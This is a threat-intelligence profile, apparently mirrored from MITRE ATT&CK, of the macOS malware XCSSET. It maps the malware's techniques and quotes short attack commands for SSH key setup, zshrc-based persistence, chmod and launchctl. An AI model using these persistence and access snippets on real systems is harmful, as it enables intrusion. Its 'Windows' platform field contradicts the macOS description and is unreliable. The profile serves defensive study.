Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

XCSSET

XCSSET is a modular macOS malware family delivered through infected Xcode projects and executed when the project is compiled. Active since August 2020, it has been observed installing backdoors, spoofed browsers, collecting data, and encrypting user files. It is composed of SHC-compiled shell scripts and run-only AppleScripts, often hiding in apps that mimic system tools (such as Xcode, Mail, or Notes) or use familiar icons (like Launchpad) to avoid detection.(Citation: trendmicro xcsset xcode project 2020)(Citation: April 2021 TrendMicro XCSSET)(Citation: Microsoft March 2025 XCSSET)
ID: S0658
Associated Software: OSX.DubRobber
Type: MALWARE
Platforms: Windows
Version: 1.3
Created: 05 Oct 2021
Last Modified: 04 Apr 2025

Associated Software Descriptions

Name Description
OSX.DubRobber (Citation: malwarebyteslabs xcsset dubrobber)

Techniques Used

Domain ID Name Use
Enterprise T1548 .006 Abuse Elevation Control Mechanism: TCC Manipulation

For several modules, XCSSET attempts to access or list the contents of user folders such as Desktop, Downloads, and Documents. If the folder does not exist or access is denied, it enters a loop where it resets the TCC database and retries access.(Citation: Microsoft March 2025 XCSSET)

Enterprise T1098 .004 Account Manipulation: SSH Authorized Keys

XCSSET will create an ssh key if necessary with the ssh-keygen -t rsa -f $HOME/.ssh/id_rsa -P command. XCSSET will upload a private key file to the server to remotely access the host without a password.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

XCSSET uses a shell script to execute Mach-o files and osacompile commands such as, osacompile -x -o xcode.app main.applescript.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1543 .004 Create or Modify System Process: Launch Daemon

XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

XCSSET uses RC4 encryption over TCP to communicate with its C2 server.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1546 .004 Event Triggered Execution: Unix Shell Configuration Modification

Using AppleScript, XCSSET adds it's executable to the user's `~/.zshrc_aliases` file (`"echo " & payload & " > ~/zshrc_aliases"`), it then adds a line to the .zshrc file to source the `.zshrc_aliases` file (`[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases`). Each time the user starts a new `zsh` terminal session, the `.zshrc` file executes the `.zshrc_aliases` file.(Citation: Microsoft March 2025 XCSSET)

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

XCSSET uses the chmod +x command to grant executable permissions to the malicious file.(Citation: 20 macOS Common Tools and Techniques)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

XCSSET uses a hidden folder named .xcassets and .git to embed itself in Xcode.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1574 .006 Hijack Execution Flow: Dynamic Linker Hijacking

XCSSET adds malicious file paths to the DYLD_FRAMEWORK_PATH and DYLD_LIBRARY_PATH environment variables to execute malicious code.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1056 .002 Input Capture: GUI Input Capture

XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Older XCSSET variants use `xxd` to encode modules. Later versions pass an `xxd` or `base64` encoded blob through multiple decoding stages to reconstruct the module name, AppleScript, or shell command. For example, the initial network request uses three layers of hex decoding before executing a curl command in a shell.(Citation: Microsoft March 2025 XCSSET)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

XCSSET searches firewall configuration files located in /Library/Preferences/ and uses csrutil status to determine if System Integrity Protection is enabled.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1553 .001 Subvert Trust Controls: Gatekeeper Bypass

XCSSET has dropped a malicious applet into an app's `.../Contents/MacOS/` folder of a previously launched app to bypass Gatekeeper's security checks on first launch apps (prior to macOS 13).(Citation: Application Bundle Manipulation Brandon Dalton)

Enterprise T1195 .001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools

XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods target_integrator.rb files under the /Library/Ruby/Gems folder or enumerates all .xcodeproj folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1614 .001 System Location Discovery: System Language Discovery

XCSSET uses AppleScript to check the host's language and location with the command user locale of (get system info).(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1569 .001 System Services: Launchctl

XCSSET loads a system level launchdaemon using the launchctl load -w command from /System/Librarby/LaunchDaemons/ssh.plist.(Citation: trendmicro xcsset xcode project 2020)

Enterprise T1497 .003 Virtualization/Sandbox Evasion: Time Based Evasion

Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, .report. After the elapsed time, XCSSET executes additional modules.(Citation: trendmicro xcsset xcode project 2020)

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.